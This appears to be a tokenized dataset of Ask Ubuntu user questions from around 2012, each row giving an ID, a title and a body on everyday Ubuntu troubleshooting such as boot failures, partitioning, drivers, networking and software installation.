110056	screen brightness flickering	after installing ubuntu 11.10 screen started flickering between two brightness levels i gues its not hardware issue because everything worked perfectly fine on windows which i have been using before ubuntu and ubuntu is installed within widows sometimes everything works fine but after suspending the screen of after screen goes iddle flickering starts again ... soo any help would be apprichiated
110058	overclock monitoring and stress testing tools in ubuntu	i would like to know what tools are available to ubuntu users for monitoring the overclock done in the bios and to stress-test the machine . tools for the following : 1 ) tool to reliably read actual clock speeds of the cpu when they are on and off load . 2 ) tool to provide bus speeds , ram speed , graphics core speed etc , in real time . 3 ) tool to monitor temperatures . 4 ) tool to monitor load on cpu/gpu . 5 ) tool to stress test the machine . although i want to ask the question with regards to any ubuntu user with any configuration so that it can be of use to everyone , my configuration is intel i5 2500k + asus p8z68-v lx , if you must know .
110059	why wo n't ubuntu software center install .deb files	i 'm running ubuntu 11.10 and have some problems with ubuntu software center and the installation of debian packages . if i download for instance the debian from https : //www.virtualbox.org/wiki/linux_downloads and try to install with ubuntu software center i got the window opening but i can see only the gtk spinner . the problem exists also with the package of my applications http : //www.giuspen.com/cherrytree/ and http : //www.giuspen.com/x-tile/ which i create with dpkg-buildpackage , the same packages are opened and installed properly with gdebi .
110060	is there any way i can increase my home folder size without uninstalling again ?	this is my problem , i downloaded the ubuntu 11.10 iso file from the web . i burned it on a cd , inserted the cd , shutdown the computer , installed ubuntu 11.10 and there was a moment i was asked how much space i wanted to dedicate to it , it was default 18gb and i left it that way . unfortunately , i did n't really know what i was doing and now my homefolder is only 18gb big with only 2.4 gb free . i do not have a partition for my home folder , this is how it looks like my partitions is there any way i can increase my home folder size without uninstalling ubuntu again ?
110070	block internet browser from one user	i was wondering if there is a way to block the internet tab ( applications/internet ) from one user . i am trying to allow games to use the internet but not allow the use of browser .
110074	ca n't boot into windows after upgrading to 12.04	i had 11.10 installed and everything worked fine until i decided to upgrade to 12.04 . now i still see the windows 7 ( loader ) option in grub but when i choose it the screen goes black for a second and then returns to grub . i tried using boot-repair but it did n't work . here 's the log from boot-repair : http : //paste.ubuntu.com/869127/ . how can i get my windows back ?
110078	how to make chromium-browser show in only one virtual desktop ?	i am now using the `` lubuntu version based on lxde '' , which is based on `` openbox '' . what frustrats me a lot is that the chromium-browser is omnipresent on both workspces . i have tried to modified ~/.configure/openbox/lubuntu-rc.xml to set the omnipresent option chromium-browser application no and reconfigure openbox-lubuntu , however there seems no effect . does anybody have similar experience ? what 's your solution for this ?
110080	option to see download speed when downloading updates	how can i see the download speed when i am downloading updates with the update manager ? see image :
110081	why ca n't i copy data from my computer to an external drive ?	why ca n't i copy data from my computer running ubuntu 11.10 to an external drive ? does it have anything to do with the format of the drives or something along those lines ? what do i need to do to be able to transfer data freely between my computer & other external drives ?
110089	vanished partition recovered , disk still half full but no data to be found !	i recently had a hard drive partition vanish on me while moving the drive from one machine to another . in an attempt to fix the problem i took it out of my ubuntu box and put it in a windows machine to recover it . the program i used found what looked perfectly like the ext4 partition ( correct disk usage , size , free space etc ) so i wrote it to the disk . when i put it back in my ubuntu machine the partition is there , with the right amount of free space left etc , but there is no data on it . i 've run testdisk but i only get info on the `` empty '' partition i already recovered and photorec just finds alot of rubbish . after reading around a bit i know i should have dd 'd the drive first and i 'll never make that mistake again . is there anything else i can try or is my data never to be seen again ? any more details anyone needs just ask , thanks in advance .
110097	search bar for xubuntu panel ?	is there an applet for the xubuntu panel that 's similar to the search bar on os x ?
110099	how can i run qemu with kvm over ssh ?	when i run qemu -cpu kvm64 -snapshot -hda binary.img at a local console , the image boots and runs as i expect . however , when i log in via ssh -c -x , i see : $ qemu -cpu kvm64 -snapshot -hda binary.img open /dev/kvm : permission denied could not initialize kvm , will disable kvm support qemu : pci_add_option_rom : failed to find romfile `` pxe-rtl8139.bin '' ( the pxe-rtl8139 message is there when run locally as well , it does n't seem to matter . ) why does using ssh make a difference ? how can i run qemu over ssh without needing root permissions ? both machines are ubuntu 11.10 , qemu and qemu-kvm are 0.14.1+noroms-0ubuntu6.2
110101	how can i join a skype public chat via links ?	in windows , i can join a skype public chat by pasting a skype chat link into a web browser 's address bar ( or clicking a link which contains that uri ) , but it does n't work in my ubuntu 10.04 using skype 2.2.0.35 . the uri is generated by skype from within a group chat via the command /get uri error messages from the following browsers are : # firefox ... the protocol ( skype ) is n't associated with any program # chromium-browser ... just treats it as s google search argument # konqueror ... protocol not supported : skype how can i get these skype : ? chat & blob= ... links to work ? edit : as i 've mentioned in response to tom brossman 's good comment , the main issue has now become : which application should be used for handling the skype protocol ... if it is skype itself , what is the syntax ? ... because skype `` % s '' does not process the protocol . if someone has actually had success with the perl module skype-action-handler with a recent version of linux skype , it would be good to know .
110102	wanting to dual boot to mac os x as my second boot , ubuntu as my first - how do i restore single boot to ubuntu ?	i 'm thinking about making a partition to test out mac os x on my own computer hard drive and do n't think it would suffice if i used it through vm . so how would i go about returning to single boot ubuntu after i decided i did n't want the mac partition anymore ? i already know how to make the partition and work gparted , but i have a few basic questions as well . 1 ) to boot to another partition i would have to make it a primary partition correct ? 2 ) in the case that i deleted the partition and re-formatted it back to my main ubuntu partition , how would i go back from dual boot to single boot ? i know in windows to change the boot options i would have to clear the boot paths so that any partition that was n't existing on it previously would n't continue to prompt me on what os to boot - does ubuntu require that i do that as well ? if so , then how ?
110103	ubuntu 11.10 black screen	this is my current specs : operating system : windows 7 x64 cpu : intel core i7 920 @ 2.67ghz bloomfield 45nm technology ram : 6.00 gb tripple-channel ddr3 @ 539mhz ( 8-8-8-20 ) motherboard : gigabyte technology co. , ex58-extreme ( socket 1366 ) graphics card : nvidia geforce gts250 2048mb monitor : lg flatron w2443 ( 1920x1080 @ 60hz ) ok. let 's get started with the dirty bits . i have created a persistent ubuntu 11.10 x32 usb pendrive stick using universal-usb-installer v1.8.8.4 so i can try out the new features . i get to the part when i reboot my pc with the usb pendrive on it and the menu screen appears to choose what i want to do , so i choose option 1 to run via usb pendrive option , but i get a black screen after choosing that option , well it actually turns off my monitor . at the bottom of the screen where you should see the f6 key , or any other f keys , they are not there , all i see is the ubuntu background at the bottom and when i try to hit the f6 key it just refreshes and nothing happens . i had this problem once before but could not remember what i did to fix it in an older version of ubuntu , i had to modify a .cfg file to be able to display the bottom part with the f keys . as i think it has something to do with the screen resolution , but not 100 % sure . i will try and burn a cd over the weekend and try and see what happens with the cd . thanks for your answers , but i have a problem with doing that request ... at the bottom of the screen where you should see the f6 key , or any other f keys , they are not there , all i see is the ubuntu background at the bottom and when i try to hit the f6 key it just refreshes and nothing happens . i had this problem once before but could not remember what i did to fix it in an older version of ubuntu , i had to modify a .cfg file to be able to display the bottom part with the f keys . as i think it has something to do with the screen resolution , but not 100 % sure . i will try and burn a cd over the weekend and try and see what happens with the cd . note : sorry i forgot my log in information . thanks
110105	how to create live ubuntu cd and connect using android usb tethering .	i can boot my old notebook only from usb or cd drive . and i want to connect the internet via my android phone using usb tethering . windows connects automatically if the phone is connected to the computer via usb cable and i turn the usb tethering on . i can not make this auto-connecting part working in slax so i hope that ubuntu would do this for me . how do i make a live ubuntu usb stick ? or i have to do this exercise help.ubuntu.com/community/installation/fromusbstick i have only windows7 available right now . furthermore , i would like to know the steps to have my live session connect to the internet using usb tethering on my android device .
110111	how do i change the size of an ext4 partition ?	i upgraded the hdd in my fog server ( ubuntu 11.4 ) to 500gb but i ca n't find a simple way to enlarge the partition to take up the empty space . i image its simple enough but i have very little experience with ubuntu/linux so things will require some dumbing down ... thanks , dave
110112	unable to connect to internet with 3g usb dongle for particular isp	i 'm using usb 3g dongle for internet . previously i was using tata docomo ( india ) as provider , and the internet was working fine . now i 've changed to bsnl , but i 'm unable to connect to the internet on ubuntu . however , i 've checked access point settings and other configuration which are required for bsnl , and it is working fine with same dongle on windows 7 . also , i 'm able to connect internet with other providers on ubuntu , but problem persists only with ubuntu . the access point for bsnl in my region is bsnlnet . in fact i configure the dongle with bsnl using default network configuration wizard that pops up when usb dongle is attached . when dongle is attached and configured with bsnl , i can see network strength in messaging menu , in mobile broadband category , of ubuntu ( note : my network icon still shows `` not connected '' status ) . and when i try to use the connection that i 've created , it fails to connect . so far , i tried using sakis3g script that i came up with while wandering over this issue on other forums , it did n't worked either . i also made sure that there are no special configuration made for bsnl on my windows 7 installation , and still it is working fine there , the problem is only with ubuntu . how can i fix it ? update : while i was unable to fix the issue in ubuntu 11.10 , it still exists in 12.04 too . i hope someone finds a solution and posts it , as i want to become full time ubuntu user but only way to connect internet in ubuntu for now is to use other provider . and i bet the problem has something to do with providers network band-type . since both tata docomo and bsnl operate on different gsm band , while in windows , huawei mobile partner manages this and i can use any gsm provider to connect with internet , i guess this is not happening with ubuntu , and i can only use tata docomo and other providers which operate on same band .
110116	error mounting : mount exited with exit code 2	i am not able to mount a ntfs ( sda2 ) partition in ubuntu , a window pops up saying `` error mounting : mount exited with exit code 2 '' errors . here is the output of fdisk -l disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xe3cde3cd device boot start end blocks id system /dev/sda1 2 12748 102390247 f w95 ext 'd ( lba ) /dev/sda2 * 12749 25497 102400000 7 hpfs/ntfs partition 2 does not end on cylinder boundary . /dev/sda3 25497 38914 107768832 7 hpfs/ntfs partition 3 does not end on cylinder boundary . /dev/sda5 2 4570 36700461 83 linux /dev/sda6 4571 10802 50056665 83 linux /dev/sda7 10803 12748 15631213+ 7 hpfs/ntfs output of sudo ntfsfix /dev/sda : mounting volume ... segmentation fault few weeks back i created the sda7 partition ( for win7 ) using gparted due to which `` partition 2/3 does not end on cylinder boundary '' msg were also creted , but things were going fine until recently now i ca n't mount sda2 . data in sda2 is very imp to me is there any way to ( force ) mount it , after copying data form it i can recreate the erroneous partitions . edit : sudo sfdisk -us -l : disk /dev/sda : 38913 cylinders , 255 heads , 63 sectors/track warning : extended partition does not start at a cylinder boundary . dos and linux will interpret the contents differently . units = sectors of 512 bytes , counting from 0 device boot start end # sectors id system /dev/sda1 16126 204796619 204780494 f w95 ext 'd ( lba ) /dev/sda2 * 204802048 409602047 204800000 7 hpfs/ntfs start : ( c , h , s ) expected ( 1023,254,63 ) found ( 1023,86,11 ) end : ( c , h , s ) expected ( 1023,254,63 ) found ( 1023,139,51 ) /dev/sda3 409602048 625139711 215537664 7 hpfs/ntfs start : ( c , h , s ) expected ( 1023,254,63 ) found ( 1023,139,52 ) end : ( c , h , s ) expected ( 1023,254,63 ) found ( 1023,37,36 ) /dev/sda4 0 - 0 0 empty /dev/sda5 16128 73417049 73400922 83 linux /dev/sda6 73420800 173534129 100113330 83 linux /dev/sda7 173534193 204796619 31262427 7 hpfs/ntfs
110118	gpg error while updating	i met this error while updating.i read questions and answers about this problem , but the point is signing key . it does n't return signing key ! get:1 http : //archive.canonical.com lucid release.gpg [ 198b ] ign http : //archive.canonical.com/ lucid/partner translation-en_us ... ... ... get:24 http : //archive.ubuntu.com lucid-security/main packages [ 380kb ] get:25 http : //archive.ubuntu.com lucid-security/restricted packages [ 14b ] get:26 http : //archive.ubuntu.com lucid-security/multiverse packages [ 4,556b ] get:27 http : //archive.ubuntu.com lucid-security/main sources [ 118kb ] get:28 http : //archive.ubuntu.com lucid-security/restricted sources [ 14b ] get:29 http : //archive.ubuntu.com lucid-security/universe packages [ 125kb ] get:30 http : //archive.ubuntu.com lucid-security/universe sources [ 34.5kb ] fetched 12.8mb in 10min 33s ( 20.3kb/s ) reading package lists ... done w : gpg error : http : //archive.canonical.com lucid release : unknown error executing gpgv w : gpg error : http : //archive.ubuntu.com lucid release : unknown error executing gpgv w : gpg error : http : //archive.ubuntu.com lucid-updates release : unknown error executing gpgv w : gpg error : http : //archive.ubuntu.com lucid-security release : unknown error executing gpgv
110119	how to trace a layer bug ( stuck layers on screen )	i 'd like a trace a bug a bit before reporting it ( i see no hope of a fix given the vague description i can muster now ) . how can i get a list of layers on screen , and track their status ? when i use chrome on ubuntu 11.04 natty narwhal , i get a bug about every other day . a layer appears onscreen that floats above all windows ( chrome or otherwise ) . it ca n't be closed , and will persist until chrome itself is completely exited : the layer i think is a context ( right click ) menu that fails to close . where can i go next to track this down a bit more ? ubuntu 11.04 natty narwhal gnome classic desktop nvidia geforce gt 430 using ( i think ) the open source drivers please add a comment if you have this bug also .
110122	ca n't install ubuntu because it says i previously installed on a drive that was a usb drive how do i fix this ?	i previously installed ubuntu on a usb drive . i have since lost it or deleted the data and when i go to try to install it says it is already installed on the usb drive letter . how can i fix this ? this is the error that i 'm getting . i do not have the usb drive or it is deleted . i have 10-15 usb drives and have no clue which one it would be . i am using wubi to try to install .
110123	how do i find a list of packages with priority : required ?	i want to find a list of all packages with the priority : field set to required . these are packages that are normally installed on every system , however i 've recently discovered that they are n't necessarily installed for foreign architectures using multiarch . what 's the best way to find these packages ?
110129	gmail for outgoing emails ?	how to setup gmail on ubuntu 10.04 server for sending emails using only console ?
110132	problem with running webgl with chrome	i just setup ubuntu 11.10 on dell xps 15z by following the instruction from here : current status/known issues for dell xps 15z ? everything seems ok until the point i failed to run opengl on chrome : http : //get.webgl.org this is the step i follow to setup the machine : 1 ) add bumblebee ppa 2 ) install nvida-current from restricted drivers 3 ) install bumblebee ( remember to `` sudo usermod -a -g bumblebee yourusername '' as said by the bumblebee readme ) 4 ) install mesa-utils 5 ) reboot 6 ) try intel card with terminal command `` glxspheres '' 7 ) try nvidia card with terminal command `` optirun glxspheres '' while the step 7 is success , but step 6 was failed with following error message : xlib : extension `` glx '' missing on display `` :0 '' . when i run `` glxinfo|grep opengl '' , it prompts '' xlib : extension `` glx '' missing on display `` :0 '' . '' this is my /etc/x11/xorg.conf section `` device '' identifier `` default device '' option `` nologo '' `` true '' endsection i have turned on webgl support for chrome as well . fairly new to this , how could i fixed this ?
110138	why ca n't i paste anything under the /usr/ folder ?	i just wanted to install a theme for the start up screen and i have to copy some files over here to /usr/share/kde4/apps/ksplash/themes/ . but the answer i get is : access denied . could not write to /usr/share/kde4/apps/ksplash/themes/ what do i have to do ? i am a new user .
110139	why is a lts release not using the extended support version of thunderbird ?	precise pangolin ( 12.04 ) is a lts ( long term support ) release of ubuntu . why is thunderbird 11 included , instead of thunderbird 10 esr ( extended support release ) ? is there any way to install thunderbird 10 esr on ubuntu 12.04 ?
110143	server needs username and password to logon which is not known	i got a used server and do n't know the username and password to login . anyone know how i can reset the username and password without needing to wipe everything and starting from scrach ?
110146	how can i calibrate my colours ?	i want to calibrate my desktop . i managed to find the colour option in the settings menu , but the calibrate button it 's greyed . how to activate it so i can calibrate my colours ?
110155	how to add skype to live usb ( before creating the usb ) ?	i have just created live ubuntu usb using unetbootin and an iso of ubuntu 11.10 . everything works fine but i miss skype . can i add skype to the iso somehow ? not to download it and install on usb after i boot from the usb ? i want to have the iso ready for next usb .
110156	small doubts partitions in ubuntu , please help	i have two small questions : i want to erase `` windows 7 - 64-bit '' , by using ubuntu 10.11 on the entire hard drive , but i do n't want to delete my /home/ dir , so is it necessary to delete all partitions or just delete c : furthermore i want to create a swap partition area ( my pc has 8gb of ram ) , so is it necessary to have the same ram in swap , or is 4gb of ram okay ? i want to hibernate . greetings and thanks .
110159	eclipse on ubuntu - multiple installation	i need to install 2 version of eclipse . one for java and one for php . should i expect that some hidden folder/file is gon na be overridden by both installation ? i downloaded to standalone installation package from the eclipse download page .
110160	how do i resize partitions using the simple installation wizard ( installing a second ubuntu ) ?	i 'm running 11.10 and installing 12.04 lts beta 1 off a dvd . using the installation wizard , i picked `` install 12.04 lts alongside 11.10 '' . i am presented with a slider with approx 240gb on the left side and 60gb on the right . no other labels are present . i do n't want to use the advanced partitioning tool . which side is which ubuntu ? if it 's relevant : i am installing only for testing purposes ( i 've been caught by kernel regressions before ) , so i want to give 12.04 the minimal amount of space required . once the final release is made , and i 've tested that too , my plan is to remove the second partition and upgrade 11.10 to 12.04 .
110166	ubuntu 11.10 overheating with sony vaio	i am a windows user trying to move over to ubuntu without much success . i have installed the 11.10 version as dual boot by using wubi tool on the ubuntu website and can only use the operating system for about 5 minutes before it overheats and shuts off the machine . i have done my searches and seen many posts about overheating but can not see one that i am able to apply to my particular case . can anyone give me a steer on this please ?
110170	what is the package name for the ubuntu installation wizard ?	i need to log a bug against the 12.04 installer ( the installation wizard that you run off the cd/dvd ) . what is the package name for this application ?
110171	can i change personal folder locations ?	i did this in windows 7 . my documents , videos , music and other personal folders are in d : \ because it is my media disk . in case of a system failure , i will always have access to these files when i reinstall the os . i just right click , i.e . `` videos '' in my personal folder ( in my case named `` tesla '' ) and click `` location '' to set a new location for it , which is in d : \tesla and in the case of videos folder in d : \tesla\videos . i do that for every personal folder . now , i want to know if this is also possible in ubuntu 11.10 ? i would like , when i open my home folder and click i.e . videos , to go to /media/media/tesla/videos ( which is where my d : \ disk is mounted ) , instead of the default /home/tesla/videos . thanks in advance . edit : i already set up ntfs automounting via the ntfs configuration tool .
110172	ubuntu 10.04 doesnt boot	i am using ubuntu 10.04-03 in virtual box . all of a sudden today it does n't boots up and shows ( initramfs ) prompt as shown below . is there anyway i can fix it as i got really important data in it .
110176	can we install any assembler in ubuntu	i have got to practice the assembly language , for that i need an assembler . i installed masm ( microsoft-macro-assembler ) over dosbox emulator , but it does not give me the code-view of my program . is there any other assembler that could solve my problem ?
110180	loop function in /bin/x11	there is a quest about /bin/x11/ in ubuntu 11.10 . x11 generate a loop , while a second x11 map is also in it , but it is not possible to delete or change the inbound x11 map within x11 . with regards ad verlijsdonk
110191	how to enable resize grips in unity-2d ?	how do you enable resize grips in unity-2d ( or any non-compiz setup ) for gtk 3 ? in oneiric , you could add the following to ~/.config/gtk-3.0/gtk.css : * { -gtkwindow-resize-grip-default : true ; } and for gtk 2 ( which still works in precise ) : style `` default-style '' { gtkwindow : :resize-grip-height = 15 gtkwindow : :resize-grip-width = 15 } class `` gtkwidget '' style `` default-style ''
110199	how to update firewall to pass nfs traffic ?	i have set up the nfs service using these instructions and it was working fine last week but today i get this error : root-nfs : unable to get nfsd port number from server , using default i restarted the nfs server like this : sudo /etc/init.d/nfs-足kernel足-server restart and tried repeatedly but still get the error . when i google the error i see the suggestion update firewall to pass nfs traffic how do i update firewall to pass nfs traffic ? or should it be some other issue since it was working fine last week ?
110202	network manager dies if my router drops the internet connection	my isp doing some repairs on my broadband cable so my internet connection is dropping frequently , when my internet connection drops , network manager , shows that there are no interfaces . i have to restart network-manager using start and stop connections to get it working again . using ubuntu with kde 4
110204	ati and i915 driver issue resolves in black screen .	i have a `` hp g72-a01sg '' , with `` ati hd 5470 '' graphic card . ever since version 9.04 i get black screens on start-up , by installation or loading original ati software/driver . i experience the same issues in 12.04 . the driver for `` i915 '' shows , that the symbols in kernel do n't match , so i tried to install ubuntu 11.10 . however , i also get a black screen in 11.10 , but this time i can see the installation window very weakly slightly . what can i do about it ? !
110205	best way to backup a whole dual-boot system	i finally have my pc exactly the way i want it , i have spent many hours installing and reinstalling ubuntu and windows , for i am very newbie in this matter . now , i would like to backup the whole disk , the way i used to do for windows xp with norton ghost . i have a lone hard drive , with a few partitions , and using ubuntu 's boot loader . is there a way i can duplicate that hard drive to an image file , or even another harddrive , so i can lately just reverse the process and have my whole system working , with ease ? thanks
110207	using a video file as a 'webcam '	is there anyway to make video0 point to a video file instead of an actual webcam ? we 're trying to hook something up using skype that points to a prerecorded video file instead of a webcam .
110208	resize nautilus properties windows	how can i resize the nautilus properties window . i tried it by clicking an edge and resizing them . but this is the smallest i can get them . as you can see below . the file-properties are really large . and i cant resize them down any further . i was wondering can i tweak it so when i open a properties window it shows a smaller window ?
110209	unable to boot into 11.10 in normal ( get a black screen ) or recovery ( get just a flashing cursor , no cli )	okay , so i had a dual boot of tango studio ( based on ubuntu 10.04 ) and windows xp . yesterday i downloaded the .iso for ubuntu 11.10 and attempted to install from a usb ( my bios wo n't normally boot from usb but i had plop boot manager on a cd ) . i booted up ubuntu from the usb and then from there formatted the partition with tango on and installed ubuntu 11.10 . on booting up i came into grub rescue mode . so i booted up from the usb again and used boot-repair to reinstall grub . after this i would see the normal grub menu , but on choosing ubuntu i would come to a black screen . on choosing recovery mode it would begin starting normally with no obvious errors but instead of coming to a cli i would just get a blank screen with a flashing cursor on the top left , not accepting any input . i have since reformatted and reinstalled from a cd rather than usb and had the exact same problem . i used boot-repair again and the result is the same . output of the most recent boot-repair is at http : //paste.ubuntu.com/869805/ i have also tried editing the ubuntu grub entry and replacing quiet with text nomodeset as i saw in an answer to another question . this got me a bit further - i saw the purple ubuntu loading screen but still came to a blank screen after that . anyway , in most of the other questions in which that is brought up the user is still able to boot into recovery , while i am not . can anyone help ? thanks in advance , let me know if there 's any more info i need to provide ! edit for more info : i read something saying it 's quiet splash that should be replaced with nomodeset . earlier i had left splash in the line . so i tried it this way and it froze after displaying the following text : fsck from util-linux 2.19.1 mountall : plymouth command failed mountall : disconnected from plymouth /dev/sda5 : clean , 139359/1741488 files , 745830/6961125 blocks from a bit of googling it does n't look like plymouth is essential , but i 've checked and i do have the most current versions of mountall and plymouth installed so i do n't know why there 's a problem edit for more info again : i used dkpg -- reconfigure plymouth cause i saw it mentioned in another forum and it still says plymouth command failed on boot follow up - july unfortunately i was not able to get this working . i needed it working and switched distribution before anyone commented or answered this question , so am unable to try out any suggestions posted here i 'm thinking of giving this another go sometime soon , if i do then i 'll report back .
110214	at job facility for anacron ?	is there a tool for ubuntu to schedule jobs similar to at but for anacron instead if plain cron ? eg . echo `` rm -rf /tmp/workdata. $ $ . * '' | at now + 99 minutes it does n't have to be via anacron , just whatever my scripts can rely on to run either at the scheduled time or when the server is back online . if it 's a scheduler only root can use i 'll just wrap the calls with sudo
110216	unity , c++ , opening a unity folder out of a qt-application	i wrote an qt-application , which shows a `` qtreewidget '' of a certain directory and its sub-directories . now i would like to make unity open a folder e.g . /home/username/ , by clicking one of the applications `` qtreewidgetitems '' . unfortunately i do n't know how the communication between unity and the qt-app works . can somebody tell me how that could be done ? thank you , doccruiser
110222	terminal suspend on ubuntu 8.04	i 'm trying to put my old laptop into suspend mode through the terminal . typing rtcwake -m disk -s 10 works in newer versions but in 8.04 i get : error /sys/class/rtc/rtc0/device/power/wakeup : no such file or directory '' rtcwake : /dev/rtc0 not enabled for wakeup events . i have tried googling this but all i get is people asking this very question with no answers . how can i suspend the computer for a pre-determined amount of time from the terminal , in older ubuntu versions ?
110226	how do you mount a lvm patition that has the same vg name as my current partition	ive been tearing my hair out for about a week now trying to figure out how to do this . i have two hdd 's in my server , both 250gig . they both have ubuntu installed , one is currently booted . i want to mount the second ( old ) drive to /mnt/external if i mount through /dev/disk/by-uuid it just mounts the boot partition , and not my actual data . i also tried vgs-v to determine , but the names are the same , and do n't know where to go from here . root @ onlinelabtests : ~ # vgs -v finding all volume groups finding volume group `` sysvolgroup '' archiving volume group `` sysvolgroup '' metadata ( seqno 3 ) . archiving volume group `` sysvolgroup '' metadata ( seqno 3 ) . creating volume group backup `` /etc/lvm/backup/sysvolgroup '' ( seqno 3 ) . finding volume group `` sysvolgroup '' archiving volume group `` sysvolgroup '' metadata ( seqno 3 ) . archiving volume group `` sysvolgroup '' metadata ( seqno 3 ) .` creating volume group backup `` /etc/lvm/backup/sysvolgroup '' ( seqno 3 ) . vg attr ext # pv # lv # sn vsize vfree vg uuid sysvolgroup wz -- n- 4.00m 1 2 0 233.72g 0 812dmv-qsf3-xnpp-khlb-mkif-q64l-z2rawf sysvolgroup wz -- n- 4.00m 1 2 0 233.72g 0 z3ibwm-fevq-n6fs-lhm9-5uqq-mdxj-qnfdlj and this root @ onlinelabtests : ~ # vgchange -a y 2 logical volume ( s ) in volume group `` sysvolgroup '' now active 2 logical volume ( s ) in volume group `` sysvolgroup '' now active but /dev/disk/by-uuid still doesnt show anything else . any help appreciated .
110228	is there any other software that can make ppt except libreoffice impress ?	i 'm running lubuntu now , which uses lxde as its desktop manager . libreoffice impress seems a little not compatible with lxde . so i want to find another software that can substitute it . can anyone suggest anything ?
110229	how to install gnome3 on lubuntu 10.10	i am running lubuntu , which uses lxde ( based on openbox ) instead of gnome and i want to install gnome3 on it . i have tested the following ppa , but it does n't work : sudo add-apt-repository ppa : gnome3-team/gnome3 sudo apt-get update sudo apt-get dist-upgrade sudo apt-get install gnome-shell what i have installed is a broken gnome3 , no special effects , no beautiful windows border , i guess it may lack something ( i have installed gnome3 before , so i did know how gnome3 looks like ) . can anyone give me a hand ? any help would be appreciated .
110230	recovering deja-dup encryption password	i have lost my encryption password for backup on deja-dup . please can you let me know how to recover it ? by the way this is after a re-installation of ubuntu 11.10 , so it is probable that the old file where the passwords were written is lost .
110231	ubuntu 12.04 remove unity and other gnome things	i updated my ubuntu 12.04 pc and see 3 packages are hold to upgrade . gnome-desktop3-data is one of them . so i installed it manually , but it is remove eog , unity , unity-greeter , a lot of indicator stuff , etc . so my system does n't boot anymore . how can i revert this changes or fix them ?
110236	move ubuntu 10 from xp dual boot to another drive	i have a system with 2 sata drives and i chooose which drive to boot from in the bios setup . one sata drive has win7 and the other has dual boot ubuntu 10 with xp . having a dual boot with xp is a pain so i want to add another sata hard drive and move ubuntu 10 to the new drive and delete the ubuntu dual boot from xp so i can choose which drive i want to boot up into . how do i move the ubuntu from the current dual boot drive to the new drive so when i boot up into the xp drive , it only comes up in xp ?
110238	evolution mail client - not able to send mails from yahoo	am new to ubuntu ( only 1 day ) and trying to fix the issue related to sending mails from evolution mail client . i have configured yahoo mail , and i am able to receive the mails but not able to send . i have gone through few posts on this forum , but not able to locate any solution . any help is much appreciated . regards , viraj rao
110242	problem with halt command to power off	i use ubuntu 11.10 . my problem is that i can not power off the computer with sudo halt command . ubuntu shutting down screen comes and stops at there ( something like the pic below ) . i waited about 15 minutes which is abnormally long and am obliged to press the power button to shut down . the second try was the same .
110243	is ubuntu a european union standard ?	i mean , is the eu using ubuntu as the main operating system for its it systems ? i had read somewhere a while ago that this was the case ? i am looking at pushing ubuntu as a file server for a small network at local enterprise and this information would be very useful to my argument . thank you .
110246	two sync folders on one laptop ?	hi can i have a business folder for syncing business files with a remote colleague and a separate personal folder of my own . i do n't mind having two accounts . in fact i 'd prefer that .
110247	where to find/install libpulsecore-1.0.so ? pulse audio problem	my skype is crashing silently . i tried to follow advice here : what to do when skype freezes silently ? and here : http : //ubuntuforums.org/showthread.php ? p=11653257 but it suggests giving permission to a file called libpulsecore-1.0.so i looked in /usr/lib/ and it was n't there . i tried sudo apt-cache search libpulsecore-1.0.so and found nothing . the tab-autocomplete after typing libpuls also did n't return anything , so i believe it is not installed . i found nothing with which libpulsecore-1.0.so and had no google hits for how to find the file , or which package it was in . how do i install this file ? sound otherwise works . ( skype even used to work fine until a couple of weeks ago . ) i 'm running 11.10 .
110248	problem using graphics.h in ubuntu	# include < stdio.h > # include < graphics.h > # include < math.h > using namespace std ; int main ( void ) { int gd=detect , gm ; int r , x , y , p , xc=320 , yc=240 ; initgraph ( & gd , & gm , null ) ; cleardevice ( ) ; printf ( `` enter the radius `` ) ; scanf ( `` % d '' , & r ) ; x=0 ; y=r ; putpixel ( xc+x , yc-y,1 ) ; p=3- ( 2*r ) ; for ( x=0 ; x < =y ; x++ ) { if ( p < 0 ) { y=y ; p= ( p+ ( 4*x ) +6 ) ; } else { y=y-1 ; p=p+ ( ( 4* ( x-y ) +10 ) ) ; } putpixel ( xc+x , yc-y,1 ) ; putpixel ( xc-x , yc-y,2 ) ; putpixel ( xc+x , yc+y,3 ) ; putpixel ( xc-x , yc+y,4 ) ; putpixel ( xc+y , yc-x,5 ) ; putpixel ( xc-y , yc-x,6 ) ; putpixel ( xc+y , yc+x,7 ) ; putpixel ( xc-y , yc+x,8 ) ; } getch ( ) ; closegraph ( ) ; } installed graphics.h compiled using gcc filename.cpp -0 filename -lgraph then used ./filename the window apperared for 10 seconds and the error below appears : [ xcb ] unknown sequence number while processing queue [ xcb ] most likely this is a multi-threaded client and xinitthreads has not been called [ xcb ] aborting , sorry about that . heart : ../../src/xcb_io.c:273 : poll_for_event : assertion ` ! xcb_xlib_threads_sequence_lost ' failed . aborted any solutions ?
110254	cd rom drive not detected in kubuntu 11.10	i am running kubuntu 11.10 on my pentium m laptop ( acer travelmate 292lci ) on an old 20gb hdd . ( it 's rather less hdd for kubuntu 11.10 , is n't it ? ) now , i know from older linux distributions ( like suse or pclos which i used some years ago ) that the cd rom drive is mounted automatically and can also be seen in the konquerer ( or like in kubuntu 's case dolphin ) . now , i partitioned the hdd and when i start dolphin it says sda1 and sda2 , but not the cd rom drive . question : do i have to mount the cd rom drive first ? ( because when i insert a cd in the drive the cd rom drive appears and i can read the content of the cd . ) but i want the cd rom drive to be visible all the time , not only when i insert a cd . ( like it was the case with the linux distributions i used some years ago and like it is the case in windows ) does anyone have a console-code or so for me concerning this matter ? thank you , thomas
110260	install 11.10 on gpt with separate /home partition	i 'm trying to install ubuntu / mint on my lenovo 570 . since it 's better to use gpt , i 'm trying to use that . i get these problems , either some partitions are misalligned , grub does n't install or it just does n't boot , just shows some firmware or whatever of the laptop , no grub , no grub error or any sort ! so i wanted some instructions on how to install 11.10 in a gpt with a separate /home partition .
110262	how can i recover my ubuntu partition ?	first i got a error message saying that no init found blah blah on booting up . i thought of clearing it via disk utility , doing so results me in file mounted or opened by another program . i tried even gparted , which does n't help me . this again results in same problem saying that file mounted or opened by another program . notably the disk utility says there are 423 bad sectors in my disk , but the problem is that i could n't clean or repair it ! for example running my smart self test results in failed ( read ) . now i need my ubuntu back to be running . how i can do that ? am a newbie to ubuntu and i felt really hard of recovering from this problem .
